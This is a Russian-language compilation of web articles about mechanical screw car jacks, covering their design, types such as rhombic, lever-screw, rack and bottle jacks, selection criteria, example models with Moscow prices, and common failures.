201 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как устроен домкрат винтовой

Винтовой механический домкрат — какой выбрать для своих целей

Винтовой механический домкрат – это устройство, с помощью которого поднимаются и фиксируются на заданной высоте грузы. Механизм приводится в движение винтом и вращательным движением; винт имеет разный размер шага. Особенность такого устройства в том, что оно при работе находится под грузом, поэтому его подъём производится вручную, без дополнительных цепей и канатов.

Применение домкратов винтового типа

Домкрат винтовой, в зависимости от особенностей механизма, используется для:

  • Замены колёс автотранспорта;
  • Обслуживания авто;
  • Прокладки труб в грунте;
  • Сжатия пружинных механизмов;
  • Подъёма и удержания грузов;
  • Перемещения опор моста (промышленные механизмы);
  • Других подъёмных работ.

Винтовые подъёмные механизмы известны около 2 тысяч лет, они появились после изобретения простейшего винта и использовались для примитивного подъёма тяжестей. Применять такой домкрат массово стали в середине XVIII века, в это время механизм отличался минимализмом, но уже кратно превосходил эффективность обычный рычаг.

В основном винтовые механизмы применяются при обслуживании и ремонте автотранспорта, такие домкраты хорошо известны автолюбителям, находясь в каждом втором багажнике.

Устройство винотового домкрата

Домкраты винтовые работают по двум принципам. В первом случае винт перемещается через червячное колесо (перемещающийся винт), во втором случае винт зафиксирован вместе с червячным колесом, а подъём груза производится за счёт движения гайки (перемещающаяся гайка). Вращательное движение преобразуется в поступательный подъём и механизм перемещает груз по вертикали и удерживает его на фиксированной высоте.

При свободной гайке важно избегать не осевых нагрузок на неё, так как это способно вывести механизм из строя, а также следить за регулярной смазкой перемещающейся гайки и закреплённого винта. Для повышения безопасности использования домкраты этого типа оснащены функционалом самоблокировки и самоторможения. Самоблокировка бывает динамической и статической, последняя срабатывает, если при работе механизма подъёмная нагрузка не приводит к движению гайки или винта.

Подъёмные механизмы винтового типа используются как самостоятельные устройства, а также применяются, как исполнительный механизм в подъёмной системе. При работе в комбинированной системе домкраты соединяются редукторами, муфтами и валами, после чего происходит их синхронизация.

Виды механических домкратов

По виду домкраты винтовые подразделяют на вертикальные устройства и стоечные.

Стоечные механизмы. Имеют один или два винта и способны поднимать груз до 3000 кг. Двухвинтовой домкрат радует повышенной грузоподъёмностью и имеет хорошую высоту подъёма. Такие устройства более устойчивы за счёт жёсткой конструкции. Недостаток – большой вес, что сужает сферу использования.

Преимущества двухвинтовой конструкции достигаются за счёт того, что роль опорной гайки играет корпус, а симбиоз двух винтов увеличивает высоту подъёма при сохранении жёсткости и устойчивости устройства.

Вертикальные домкраты. Их конструкция не претерпела изменений последние 25 лет, несущими элементами в них являются винт и металлический корпус, а грузоподъёмность не превышает 1000 кг. «За глаза» механизмы этого типа называют жигулёвскими, они относятся к нижнему ценовому сегменту и при относительно большом рабочем ходе способны поднимать груз на достаточную высоту при ограниченных усилиях.

Из недостатков таких домкратов выделим:

  1. Плохую устойчивость;
  2. Ограниченную сферу применения (только авто, которые имеют специальные проушины).

Типы домкратов: ромбический и рычажно-винтовой

Домкрат ромбический – это устройство, которое поднимает и удерживает авто с массой до 2000 кг и состоит из 4 рычагов, которые соединены шарнирами, образуя в результате по форме ромб. Спуск и подъём грузов осуществляется за счёт изменения углов ромба. Преимущества ромбических домкратов – объёмная опорная площадка и жёсткость конструкции, из недостатков выделим минимальный рабочий ход механизма и высокую его стоимость. Такой домкрат подойдёт, если необходим подъём груза по всему периметру, например, при техническом осмотре, ремонте и обслуживании авто.

Рычажно-винтовой домкрат поднимает вес за счёт силового винта, а также двух рычагов – верхнего и нижнего. Верхний рычаг оснащён подхватом и гайкой, а нижний имеет упор винтового типа и опорную площадку. Преимущества устройства – минимальный вес и простота в работе, основной недостаток – слабая жёсткость устройства при работе и плохая устойчивость.

Рычажно-винтовой подъёмник – это комбинация рычажного и ромбического механизма, которая вобрала в себя все плюсы данных устройств. Механизм имеет низкий порог подхвата и небольшой шаг, что позволяет ему работать с разными грузами, в условиях цеха или стройобъекта.

Если домкрат нужен для подъёма грузов с малой высоты, то выбирают низкоподхватные механизмы со специальной лапой, которая может поднимать груз с высоты от 70 мм. Такие механизмы используются в цехах и способны поднимать и удерживать груз большой массы.

Как выбрать винтовой домкрат

Выбирая домкрат механический винтовой, рекомендовано учитывать особенности его использования, в частности:

  1. Грузоподъёмность,
  2. Рабочий ход (мм),
  3. Высоту подъёма и подхвата (мм).

Если механизм приобретается на производственный процесс, то принимается во внимание технологическая документация к имеющемуся оборудованию и сопоставляется с предполагаемой нагрузкой на подъёмный механизм. Для ремонта авто и подъёма небольших грузов выбирают устройство с грузоподъёмностью до 2 тонн, как правило, ромбического типа.

Обратите внимание – корпус механизма изготавливается из алюминиевого и чугунного сплава, а самое надёжное червячное колесо из биметалла. Важный момент – грузоподъёмность. Часто, покупая домкрат, совершают ошибку, так как сравнивают грузоподъёмность домкрата и массу транспорта. Это неверно, ведь для замены колеса поднимать авто полностью не надо.

Повышает практичность домкрата защитный гофр – он защищает винт от попадания на него частиц пыли и грязи, что увеличивает срок службы механизма, и он не подведёт в неподходящий момент. Гофр обычно изготавливается из нейлоновой заготовки и имеет двухстороннее ПВХ покрытие.

По сравнению с другими домкратами, например, гидравлическими винтовое подъёмное устройство надёжно, просто в применении и безопасно. Сложные промышленные механизмы не используются в быту, их обслуживание – это прерогатива специалистов строительных и монтажных предприятий. Грузоподъёмность промышленных домкратов до 100 тонн.

Обзор винтовых домкратов с ценами по Москве

Цена на винтовые домкраты в Москве градируется в зависимости от особенностей, типа и вида устройства. Ромбические винтовые механизмы Зубр, RНOMBUS и Inforce стоят от 428 до 1470 рублей, а их грузоподъёмность составляет от 1 до 2 тонн. Оптимальный вариант: RНOMBUS-911 с грузоподъёмностью 1,5 тонны, он подойдёт для обслуживания, ремонта и технического осмотра любого легкового авто.

Промышленный винтовой домкрат ТОР 126101 с грузоподъёмностью 10 тонн обойдётся в сумму от 4500 до 5000 рублей, а его облегчённый вариант ТОР 12651 стоит 3300 рублей. Максимальная цена у модели QL/CNL032 с грузоподъёмностью 32 тонны – 10300 рублей, а предельный вес груза у промышленной модели доходит до 100 тонн.

Уважаемые читатели, комментируйте статью, задавайте вопросы, подписывайтесь на новые публикации — нам интересно ваше мнение 🙂

Домкрат механический винтовой для автомобиля

Домкрат – одна из первых вещей, которая должна быть в наборе автомобилиста. Именно при помощи данного приспособления мы можем заменить пробившееся колесо либо приподнять машину для ремонта при отсутствии смотровой ямы. Это незаменимая вещь в дальних поездках. При подборе данного инструмента многие предпочитают покупать домкрат винтовой механический. Своими руками его сделать очень трудно. Да и стоимость его позволяет приобрести инструмент даже самому экономному автолюбителю. Сегодня мы рассмотрим, что собой представляет домкрат винтовой механический (УАЗ в том числе) и как он работает.

Характеристика

Описываемый инструмент являет собой несложный механизм, позволяющий поднимать и фиксировать грузы на высоте. В нашем случае домкрат механический винтовой выполняет функцию подъема автомобиля (УАЗ это или иномарка, не имеет значения).

Его особенность – возможность установки непосредственно под грузом. Подъем машины осуществляется благодаря винтам. Отсюда и название — «домкрат механический винтовой».

Конструкция

Механизм не отличается сложной конструкцией. Так, домкрат механический винтовой бутылочный состоит из следующих элементов:

Когда водитель подает крутящий момент (в нашем случае это рука), происходит преобразование усилий, и в результате поступательных движений механизм поднимает автомобиль. Сейчас очень популярны механизмы с тройкой «винт-ролик-гайка». Они являются более усовершенствованной конструкцией классического винтового домкрата. Но и такие механизмы весьма надежны по сравнению с электрическими аналогами.

Кстати, на некоторые винтовые домкраты устанавливают дополнительно электродвигатели. Это позволяет увеличить коэффициент полезного действия механизма. Но стоимость таких деталей в разы дороже. Поэтому большая часть автолюбителей предпочитает покупать домкрат механический винтовой бутылочный 2т. Такой инструмент справится с задачей подъема как легковых машин, так и внедорожников.

Принцип работы

Как действует домкрат винтовой механический 2т? Его принцип работы предельно прост — благодаря рычагу, производятся вращательные усилия. Далее через червячный редуктор они преобразовываются в поступательные. Домкрат поднимается.

Если рассматривать усовершенствованную тройку «винт-ролик-гайка», здесь в работе учувствует шарик либо ролик. Благодаря нему, водителю придется приложить меньше усилий, чем с обычной парой. При этом скорость подъема увеличивается.

Существует ли домкрат винтовой механический 5т? Здесь обязательно имеется электрический двигатель. Вручную такую массу просто не поднять. Применение электрического привода значительно повышает КПД механизма и скорость его работы.

Вертикальные

Домкрат механический винтовой вертикальный был изобретен около 30 лет назад. Основные его составляющие – это винт, рычаг и металлический корпус. Максимальная грузоподъемность таких устройств составляет не более одной тонны. Главные плюсы вертикальных устройств:

  • большой рабочий ход механизма;
  • малая масса, несмотря на то что он полностью металлический;
  • небольшая стоимость.
  • легкость эксплуатации (для подъема не нужно прикладывать много усилий).

Для страховки от «подлома» вертикального домкрата, опытные автолюбители рекомендуют дополнительно подкладывать под кузов поднятого автомобиля бревна, кирпичи или иные подходящие предметы.

Среди недостатков необходимо отметить малую площадь контакта. В результате вертикальные механические домкраты являются одними из наиболее неустойчивых. Использовать их можно только на максимально ровной поверхности. Также такие инструменты очень длинные – в обычную нишу под полом багажника их не поставить. И самый главный недостаток – подъем осуществляется через специальные проушины.

Стоечные

В своей конструкции описываемый домкрат механический винтовой имеет один или два винта. Такой тип рассчитан на подъем грузов массой до трех тонн. А если учесть, что поднимается только одна сторона, то таким домкратом можно пользоваться для больших микроавтобусов и некоторых грузовых автомобилей. В качестве опорной гайки у инструментов с двумя винтами служит сам корпус.

Их конструкция предельно проста — в первый винт вкручивается второй, меньшего диаметра. Последний имеет крупную резьбу. Такая конструкция позволяет значительно увеличить грузоподъемность механизма при минимальных усилиях со стороны автовладельца.

Основной плюс, которым обладает, например, домкрат «Автопрофи» механический винтовой данного типа, — это устойчивость. Стоечные механизмы могут использоваться даже на кривой поверхности с небольшим уклоном. Главные недостатки – это малый рабочий ход и большой вес. Поэтому такие механизмы подбираются строго по клиренсу.

Рычажно-винтовые

Такие механические домкраты часто встречаются на ВАЗовской «классике» и «Ладе» десятого семейства. Рычажно-винтовые устройства используются для легковых автомобилей. Их грузоподъемность составляет до полутора тонн.

В конструкции механических домкратов данного типа имеется винт, рукоятка и два рычага (нижний и верхний). На последнем есть подхват и гайка. Верхний же служит опорной площадкой для легкового автомобиля.

Главный плюс таких устройств – это небольшой вес и малая стоимость. Также рычажные элементы имеют большой рабочий ход. Среди минусов этих механических домкратов необходимо отметить малую устойчивость. Если подъем осуществляется на спуске или уклоне либо машину перекосило на несколько градусов, такой инструмент попросту гнется. Это не самое надежное решение. Даже дорогостоящие модели не застрахованы от таких деформаций. Всему виной особенность конструкции рычагов.

Ромбические

Они встречаются реже, чем рычажно-винтовые и стоечные аналоги. По грузоподъемности такие домкраты немного уступают стоечным. Максимальная масса, на которую они рассчитаны, составляет две тонны.

Но этого хватит для подъема рамных внедорожников и минивэнов. В конструкции используется четыре шарнирных рычага. Они расположены ромбом – отсюда и характерное название.

С изменением угла наклона рычагов, производится поднятие и опускание автомобиля. Такие элементы обладают большой площадью опоры и могут использоваться практически на любой обочине. Неважно, какой угол наклона у машины – ромбический домкрат не деформируется и выдержит всю возлагаемую на него нагрузку. Единственный недостаток таких устройств – это малый рабочий ход.

Как и в случае со стоечными, их подбирают в соответствии с клиренсом конкретного авто. Также весьма популярны ромбические домкраты с электрическим приводом. Но их цена в 4-5 раз выше, нежели у механических аналогов.

Требования к домкратам

При подборе описываемого инструмента, необходимо руководствоваться определенными принципами и требованиями:

  1. КПД. Он должен составлять не менее 25 процентов. В идеале эта цифра должна приближаться к 90 процентам.
  2. Высокая точность. Верхняя опора механизма, которая соприкасается с элементом кузова (порогом) должна точно повторять его контуры. Обычно на пороге имеется специальный желобок. В него вставляется домкрат. Если он не будет повторят форму желобка, это может спровоцировать опрокидывание автомобиля. Как результат – повреждение кузова и самого домкрата. Кстати, чтобы не царапать металлическую часть автомобиля, эта опора имеет резиновую или полиуретановую накладку. Если она есть, это большой плюс. Ведь при повреждении краски, такой металл начинает быстро гнить, особенно если дороги посыпают солью.
  3. Грузоподъёмность. Чем выше показатель, тем универсальнее будет механизм. Его можно использовать не только для легковых, но и для грузовых машин.
  4. Хорошая смазка. Места, где гайка соприкасается с винтом, должны иметь хорошую смазку. Если ее нет, такой механизм не прослужит долго. При попадании воды, образуется ржавчина на резьбе. В результате обычными руками такой автомобиль уже не поднять. Данная смазка должна выдерживать температуру от минус 45 до +95 градусов Цельсия.
  5. Высота подъема. Чем она выше, тем лучше.

Заключение

Итак, мы выяснили, как устроен и работает механический домкрат винтового типа. Рассмотрев преимущества и особенности каждого типа, вы самостоятельно сможете подобрать наиболее подходящий для вас вариант. Удачи!

Механический винтовой домкрат — виды и особенности применения

Винтовой домкрат представляет собой механизм, главная цель которого заключается в поднятии и фиксировании грузов на высоте. Отличие его от иных механизмов заключается в установке винтового механизма непосредственно под грузом, что позволяет исключить необходимость в использовании дополнительных инструментов. Подъём груза осуществляется посредством винтов.

Конструкция и виды винтовых домкратов

Огромное число людей полагает, что механические винтовые домкраты необходимы только для смены автомобильных колёс, и даже не догадываются о том, что посредством таких устройств перемещаются пролётные строения мостов.

Удерживаются в необходимом положении корпуса тяжёлых автомобилей, сдавливаются мощнейшие пружины, перемещаются сквозь грунт стальные трубы. Конструкция винтовых устройств незамысловата, они отличаются своей надёжностью.

По виду приложения усилий, винтовые изделия разделяются на следующие:

  • ручные;
  • оснащённые электроприводом.

По своей конструкции:

Винтовые домкраты относятся к несложным и мощным механизмам. Принцип их действия заключается в превращении вертящего момента в поступательное перемещение. Главными элементам этих приспособлений является пара «винт-гайка» и редуктор червячного типа.

Редуктор подаёт вертящий момент к гайке, где он, преобразовавшись в поступательное движение, производит подъём груза. В более усовершенствованной модификации — домкратах с шариково-винтовой передачей (ШВП) к паре «винт-гайка» добавляются дополнительные шарики либо ролики.

Добавление дополнительных элементов позволяет повысить КПД такого устройства путём снижения фрикционного сопротивления, увеличить время эксплуатации и быстроту поднимания груза. Однако, стоимость такого механизма несколько выше, чем у обычного винтового приспособления.

У винтовых и механизмов с ШВП имеются свои достоинства. Сначала был разработан домкрат винтовой. Затем, когда понадобилось поднимание грузов со всё большей массой, были изобретены устройства, базирующиеся на группе домкратов с электроприводом.

Установка группы таких изделий, работающих одновременно и синхронно, позволяет производить поднимание грузов большой массы, осуществляя их в перемещение посредством симметричной трансмиссии.

Вертикальные механические устройства

Устройство винтовых домкратов вертикального типа было разработано ещё 30 лет назад и с тех пор практически не претерпело изменений. Основными конструктивными элементами этих устройств считаются винт и корпус, изготовленный из стали. Грузоподъёмность их невелика — до 1 тонны.

Основные преимущества вертикальных приспособлений:

  • Приложение незначительного усилия на рукоятку, стабильность нагрузки.
  • Значительный рабочий ход.
  • Существенная высота поднятия.
  • Небольшая масса.
  • Невысокая стоимость.

Минусы вертикальных конструкций:

  • маленькая площадь опирания и как следствие, невысокая устойчивость;
  • крупные размеры;
  • возможность применения только при подъёме автомобилей, оснащённых особыми проушинами.

Для страховки от «подлома» вертикального домкрата, опытные автолюбители рекомендуют дополнительно подлаживать под кузов поднятого автомобиля бревна, кирпичи или иные подходящие предметы.

Стоечные механические домкраты

Конструкции стоечно-винтовые выпускаются с одним или с двумя винтами и способны осуществлять поднятие грузов массой до 3 т. Принцип работы одновинтовых изделий идентичен вертикальным. А у двухвинтовых в качестве опорной гайки служит корпус.

В первый винт, с более крупным диаметром, вкручен другой винт, имеющий крупную резьбу. Во время вращения ручки выносится винт большей окружности, а из него — винт с меньшим диаметром, чем увеличивается высота поднятия груза.

Стоечные винтовые конструкции обладают отличной устойчивостью, обладают жёсткой конструкцией. К изъянам можно отнести серьёзный вес, а для домкратов с одним винтом — ещё и относительно небольшую высоту подъёма.

Рычажно-винтовые приспособления

Домкраты рычажно-винтовые относятся к многофункциональным устройствам и применяются для подъёма автомашин массой до 1 т. Главные элементы конструкции — винт, верхний и нижний рычаги.

На верхнем рычаге размещены подхват и гайка, а на нижнем — винтовой упор и опорная площадка. Угол между рычагом с подхватом и рычагом с опорной площадкой изменяется путём вращения ручки.

Достоинствами таких устройств считаются относительно небольшая масса, низкая стартовая высота и значительный рабочий ход. К минусам можно отнести низкую устойчивость и малую жёсткость конструкции.

Винтовые механические ромбические устройства применяются для подъёма машин массой до 2 т. В комплект несущего компонента включены четыре рычага, которые соединены при помощи шарниров, расположенных ромбом.

Опускание и поднятие приспособления осуществляется путём изменения углов ромба. Винтовые домкраты обладают жёсткой конструкцией и большой поверхностью опоры, универсальны в использовании. Недостаток один — это малый рабочий ход.

Ромбические домкраты

Ромбические механизмы производятся не только с механическим, но ещё и с гидравлическим электро — либо ручным приводом. Эти устройства способны поднимать груз весом до 1,5 т.

Конструкция их отличается надёжностью, малыми размерами и значительной высотой поднимания груза. Единственным недостатком является достаточно высокая стоимость.

Изделия комбинированные рычажно-винтовые являются своеобразным соединением рычажного и ромбического домкратов. Такие домкраты не габаритны, обладают малой начальной высотой. Недостатка два — это низкая устойчивость и недостаточная жёсткость конструкции.

Описанные виды винтовых механических изделий можно отнести к устройствам преимущественно для бытового использования, однако, у каждой разновидности можно подобрать и модели, отличающиеся своей мощностью. Так, винтовой механизм, применяемый в строительстве, обладает большими габаритами и способен поднимать в десятки раз больший вес.

Выбирать подходящее устройство нужно, отталкиваясь не только от планируемых объёмов работ, но и проводя необходимые подсчёты.

Выбор винтовых подъёмных механизмов

При выборе домкрата, сначала необходимо определиться, хватит ли собственных сил при использовании приспособления механического или необходим электрический привод. Для поднятия груза вручную расчёты не нужны, а вот при постановке более серьёзных задач следует сделать расчёт винтового устройства.

Расчёт сводится к тому, чтобы верно вычислить требуемую мощность конструкции. На страницах, имеющихся в сети сайтов, располагаются калькуляторы, при помощи которых можно провести расчёт. Но при подборе домкрата также нужно рассматривать и их главные характеристики: высоту подъёма и подхвата, рабочий ход.

Для приспособлений гидравлических будет иметь влияние и передаточное число, от которого зависит усилие на рукоятку, а также мощность электродвигателя. Самые распространённые домкраты среди автолюбителей – механические.

Они отличаются простотой конструкции, низкой стоимостью и нетребовательны к условиям перевозки и хранения. Также они легко поддаются ремонту, в отличие от гидравлических.

Но наиболее популярными изделиями являются, все же, ромбические, так как подавляющее большинство автомашин российского изготовления оснащаются именно такими устройствами. Однако случается и такое, что необходимо купить новое устройство на замену, отслужившего свой срок, старого.

При покупке нужно точно знать массу своей машины и подбирать домкрат с соответствующей грузоподъёмностью. Приобретать устройство следует с небольшим запасом и не забывать о том, что более мощные механизмы обладают большей массой и габаритами, для них требуется больше свободного места в багажнике или в гараже.

Лучше всего приобретать устройства отечественного производителя, так как по сравнению с иностранными аналогами отличие в функциональности незначительное, а стоимость гораздо ниже. К тому же сервисные центры для импортных устройств имеются не во всех, даже крупных городах.

Если под днищем машины имеется достаточно ровная площадка, то в принципе подойдёт любой домкрат, но коль имеются впадины под какой-либо конкретный тип устройства, то придётся искать только такую конструкцию.

Для поднятия автомобиля в гаражных условиях подойдёт практически любая модель с электроприводом как гидравлическая, так и механическая. Для использования домкрата в полевых условиях лучше выбирать механическую модель с ручным приводом.

О домкратах винтовых бутылочных: особенности моделей этого типа

Время на чтение: 4 минуты

Незаменимым помощником каждого автомобилиста является такой инструмент, как домкрат. На дорогах случается всякое, и поэтому иметь этот важный атрибут просто необходимо. Разновидностей подъемных агрегатов существует много, и отличаются они друг от друга по нескольким параметрам. Поэтому сделать выбор в пользу одного из множества весьма затруднительно.

Выбор необходимо делать исходя из целей использования домкрата. Каждая модель имеет собственные показатели, на которые и нужно опираться. Самые важные моменты, которые следует учитывать при выборе инструмента:

Разновидности домкратов

  • грузоподъемность;
  • уровень подъема;
  • рабочий ход;
  • устойчивость;
  • универсальность;
  • усилие рычага.

Учитывая все вышеперечисленные критерии, можно подобрать именно тот инструмент, который необходимо.

Винтовой домкрат бутылочного типа

  • маленькие габариты;
  • эффективность использования;
  • долговечность;
  • устойчивость;
  • простота и надежность.

Его очень легко разместить в багажнике, так как он не требует много места. И плюс ко всему, его можно хранить в любом положении, в отличие от гидравлического типа. Этот домкрат относится к механическим образцам, поэтому в случае поломки его возможно отремонтировать самостоятельно.

Домкрат винтовой бутылочный

Еще один плюс такого агрегата — это его цена. По отношению к остальным разновидностям таких инструментов этот тип стоит дешевле, поэтому пользуется большей популярностью у водителей легковых автомобилей. Но все же цена варьируется, и это зависит от производителя и материала, из которого выполнен продукт.

У винтовых домкратов бутылочного типа есть и минусы:

  • маленькая грузоподъемность;
  • небольшая высота подъема;
  • незначительная площадь опоры;
  • необходимость постоянно контролировать резьбовое соединение.

Модели и производители винтовых бутылочных домкратов

Фирма TOR выпускает достаточно дорогие модели, но такая цена вполне отвечает качеству продукта. Самый популярный домкрат этого производителя — это TOR 3.2т. Он хорошо подходит для автолюбителей, так как имеет маленькие габариты и вес. При грузоподъемности в 3.2 т он может поднимать груз на высоту до 335 мм. Весит такой агрегат всего 4.3 килограмма. Модели таких домкратов очень хорошо подходят для интенсивного использования.

Агрегаты от 10 до 32 тонн данного производителя рассчитаны для крупногабаритных автомобилей, а также для использования в строительных целях. Их габариты и масса намного превышают показатели предыдущих моделей. Такие домкраты можно устанавливать даже на неровную поверхность. Благодаря качественному материалу их можно использовать при любых погодных условиях.

Агрегат фирмы Skyway S01803001 имеет как много плюсов использования, так и немало минусов. Домкрат механический винтовой телескопический имеет грузоподъемность 2 т. Его вес — всего 3.9 кг, размер — 160×118×180 мм. При таких незначительных показателях массы и габаритов он может поднимать груз до 390 мм. Благодаря такой компактности он хорошо подойдет для использования автолюбителями. Недоработки модели заключаются в том, что удерживать груз длительное время Skyway S01803001 не способен. При его использовании необходимо добавлять дополнительные опоры. Поднятый таким агрегатом груз перемещать нельзя. Также нельзя находиться под поднятой домкратом машиной без дополнительной поддержки.

Домкрат фирмы Skyway

Винтовой домкрат BIG RED SJ25 может поднять груз весом до 25 т. Такой агрегат чаще применяется в строительных и ремонтных сферах. Несмотря на свои небольшие габариты, он очень устойчив и может понимать вес до уровня 669 мм. Данная модель имеет массивную ручку, благодаря которой BIG RED SJ25 легко переносить. Домкраты такого типа хорошо подходят для частого использования как в помещении, так и на открытом воздухе.

BIG RED SJ25 способен удерживать груз очень долго, дополнительные опоры в данном случае не понадобятся.

Прежде чем выбирать домкрат, нужно определиться со сферой его эксплуатации. Особое внимание следует заострять на максимальной грузоподъемности и уровне подъема груза. Качество материала тоже играет не последнюю роль в выборе. В таких моделях обязательно должна присутствовать защита от коррозии. Только так подъемный механизм сможет прослужить долгое время и не ломаться.

Принцип работы домкрата

Домкрат бутылочный механический состоит всего из нескольких комплектующих:

  • вертикальный корпус;
  • винт большого сечения;
  • приводная рукоять;
  • опорная гайка.

Принцип работы инструмента

Устранение неполадок

Винтовые домкраты хоть и надежнее некоторых моделей, но они также имеют свойство ломаться. Из наиболее частых поломок можно выделить срыв резьбы либо лопнувшую гайку. Если срывается резьба, то тут необходимо покупать новый инструмент. Во втором случае проще: можно заказать изготовление аналогичной гайки в мастерской и потом просто заменить треснувшую. Но все же ради собственной безопасности стоит купить новый, качественный инструмент.

Выбирать между множеством предложений всегда сложно. Каждый производитель старается выдвинуть свой инструмент на первое место, и иногда непонятно, какую же модель купить. Для более детального ознакомления с тем или иным домкратом можно почитать отзывы покупателей либо посмотреть видео, подходящее данной тематике.

Устройство и принцип работы винтового механического домкрата

Винтовой домкрат — это механизм, чья основная задача заключается в поднятии груза и фиксировании его на высоте. От прочих подобных механизмов винтовой подъемник отличается тем, что механизм устанавливается непосредственно под грузом, благодаря чему отпадает необходимость использовать дополнительные инструменты — цепи и канаты. Груз поднимается посредством винта вручную.

Многие считают, что винтовой механический домкрат применяется лишь при смене колес автомобиля, хотя с помощью подобных механизмов перемещаются и пролетные строения мостов; удерживаются в нужном положении корпуса больших машин, сдавливаются мощные пружины, перемещаются сквозь почву стальные трубы. Конструкция винтового устройства незамысловата, и она отличается надежностью.

Конструкция и виды

По виду приложения усилий изделия делятся на:

По конструкции разделяют:

Винтовые домкраты — простые и мощные механизмы, а принцип действия их в преобразовании крутящего момента в поступательное движение. Главными элементами выступают червячный редуктор и пара «винт-гайка».

Редуктор подает на гайку крутящий момент, где тот преобразовывается в поступательное движение и поднимает груз. В усовершенствованных модификациях — домкратах с шариково-винтовой передачей — к паре «винт-гайка» добавлены дополнительные шарики или ролики. Эти дополнительные элементы позволяют увеличить КПД за счет снижения фрикционного сопротивления, увеличить срок эксплуатации и скорость поднятия груза. Стоит подобный механизм дороже обыкновенного.

Сначала разработали домкрат винтовой. Когда понадобилось поднимать грузы большей массы, изобрели устройства с электроприводом. Установка группы этих устройств, которые работают синхронно и одновременно, позволяет поднимать грузы большой массы, перемещая их симметричной трансмиссией.

Вертикальные устройства

Конструкцию винтовых вертикальных домкратов разработали 30 лет назад, и с того времени она практически не изменилась. Главные конструктивные элементы устройств — это винт и корпус из стали. Грузоподъемность — до 1 т.

Основные преимущества:

  • Незначительность усилия, прилагаемого на рукоятку.
  • Большой рабочий ход.
  • Стабильность нагрузки.
  • Большая высота поднятия.
  • Невысокая стоимость.
  • Небольшая масса.

Минусы:

  • Маленькая площадь опоры, невысокая устойчивость.
  • Возможность применения лишь для подъема автомобилей с особыми проушинами.
  • Большие габариты.

Во избежание «подлома» опытные автолюбители советуют дополнительно подкладывать под кузов поднятой машины бревна, кирпичи и т. п.

Стоечные механические

Стоечно-винтовые конструкции выпускаются с одним-двумя винтами и могут поднимать грузы массой до 3 т. Принцип работы одновинтовых устройств такой же, как у вертикальных. В двухвинтовых домкратах роль опорной гайки играет корпус. В первый винт с большим диаметром вкручен второй винт с крупной резьбой. При вращении ручки выносится винт большей окружности, из которого выходит винт с меньшим диаметром, за счет чего высота поднятия увеличивается.

Стоечные винтовые конструкции устойчивы и имеют жесткий каркас. К минусам можно отнести большой вес, а для домкратов с одним винтом — относительно малую высоту подъема.

Рычажно-винтовые

Многофункциональные устройства, применяющиеся для поднятия автомашин массой до тонны. Главными элементами являются винт, нижний и верхний рычаги. На верхнем рычаге имеются гайка и подхват, на нижнем — опорная площадка и винтовой упор. Угол между рычагом с подхватом и рычагом с площадкой изменяется вращением ручки.

Достоинства устройств:

  • Сравнительно небольшая масса.
  • Большой рабочий ход.
  • Низкая начальная высота.

К минусам можно причислить невысокую жесткость конструкции и слабую устойчивость.

У винтовых домкратов жесткая конструкция и большая поверхность опоры, в использовании они универсальны. Недостаток же в малом рабочем ходе.

Ромбические домкраты

С помощью винтовых механических ромбических устройств поднимаются машины массой до 2 т. В комплекте несущего компонента имеются четыре рычага, соединенных шарнирами, которые расположены ромбом. Опускание и поднятие осуществляются за счет изменения углов ромба.

Привод ромбических механизмов может быть:

  • механическим;
  • гидравлическим;
  • электрическим;
  • ручным.

С помощью этих устройств можно поднять груз весом до 1,5 т. Конструкция имеет небольшие размеры, надежна, позволяет поднимать грузы на значительную высоту. Недостаток в довольно большой цене.

Комбинированные рычажно-винтовые изделия представляют собой своеобразное соединение ромбического и рычажного домкрата. Они негабаритны и имеют малую стартовую высоту. Недостатки же заключаются в низкой устойчивости и недостаточной жесткости.

Описанные виды могут быть отнесены к устройствам для применения главным образом в быту. Каждая разновидность представлена разными по мощности моделями. Так, винтовой механизм, который применяется в строительстве, имеет большие габариты и может поднимать очень большой вес.

Выбор винтовых подъемников

Выбирается устройство с учетом планируемого объема работ и после проведения необходимых расчетов. Выбирая домкрат, определитесь сначала, хватит ли своих сил для использования механического приспособления или нужен электрический привод.

Если груз предполагается поднимать вручную, расчеты не проводятся, но когда предстоит выполнение более серьезных задач, производится расчет винтового устройства. Вычисления сводятся к определению требуемой мощности. С этой целью используются калькуляторы, предлагаемые рядом сайтов.

Еще при выборе домкрата нужно обратить внимание на его основные характеристики — рабочий ход и высоту подъема. Для гидравлических приспособлений важно передаточное число, от которого зависят усилие, передающееся на рукоятку, и мощность электромотора.

Наиболее распространенными среди автолюбителей домкратами являются механические устройства. Они имеют простую конструкцию, недорогие, нетребовательны к условиям хранения и перевозки, легко ремонтируются.

Тем не менее самые популярные — это ромбические домкраты, ведь подавляющее большинство автомашин российского производства оснащаются именно ими. Если нужно купить новое устройство, узнайте массу своего авто и подберите домкрат соответствующей грузоподъемности. Приобретайте устройство с небольшим запасом и не забывайте, что более мощные механизмы имеют большую массу и габариты, следовательно, им нужно больше места в гараже и багажнике.

Лучше покупать отечественные домкраты, так как в сравнении с зарубежными аналогами отличие в функциональности невелико, а стоимость гораздо меньшая. Вдобавок сервисные центры, ремонтирующие импортные устройства, есть не в каждом крупном городе.

Если под днищем авто имеется достаточно ровная площадка, подойдет в принципе любой домкрат, но когда предусмотрены выемки под конкретное устройство, придется искать его. Для подъема машины в гараже сгодится практически любая модель с гидравлическим, механическим или электроприводом. В полевых условиях рекомендуется использовать механический домкрат с ручным приводом.

Как пользоваться винтовым домкратом для легкового автомобиля

Автомобильный домкрат сегодня — неотъемлемое приспособление, которое есть почти у каждого автовладельца. Потому как простейшая поломка, связанная с необходимостью снятия колеса, без домкрата станет неразрешимой в дорожных условиях. В материале данной статьи мы рассмотрим, как пользоваться винтовым домкратом правильно и безопасно, а также разберем преимущества и недостатки распространенных моделей винтовых домкратов.

Содержание:

Преимущества и недостатки винтовых домкратов

Винтовой домкрат для легкового автомобиля предназначен для подъема на небольшую высоту легковых автомобилей и малотоннажных грузовиков массой до 3 тонн. На сегодняшний день наибольшее распространение получили четыре конструкции. Рассмотрим преимущества и недостатки каждой из них:

  1. Ромбический винтовой домкрат. Самая распространенная конструкция. Представляет собой четыре шарнирно соединенные винтовой передачей балки, которые имеют форму ромба.

ремонтопригодность, высокая устойчивость, компактность, отсутствие смещения точки закрепления на кузове
в процессе подъема

быстрый выход из строя даже
при небольшой деформации несущих элементов, не самая простая
конструкция

Рычажно-винтовой домкрат. Второй по распространенности. Самый дешевый вариант из всех, что обусловливает высокий спрос на него.

простота конструкции, низкая стоимость

слабая устойчивость, смещение точки опоры в процессе подъема

